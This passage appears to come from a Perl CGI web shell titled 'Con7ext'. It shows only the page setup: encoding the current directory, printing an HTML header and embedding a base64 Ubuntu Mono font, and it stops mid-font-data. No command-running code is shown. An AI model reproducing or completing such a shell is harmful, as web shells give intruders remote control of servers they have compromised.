$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
print "Content-type: text/html\n\n";
print <<END;
<html>
<head>
<title>Con7ext</title>
$HtmlMetaHeader
<style>
@font-face {
    font-family: 'ubuntu_monoregular';
src: url(data:application/x-font-woff;charset=utf-8;base64,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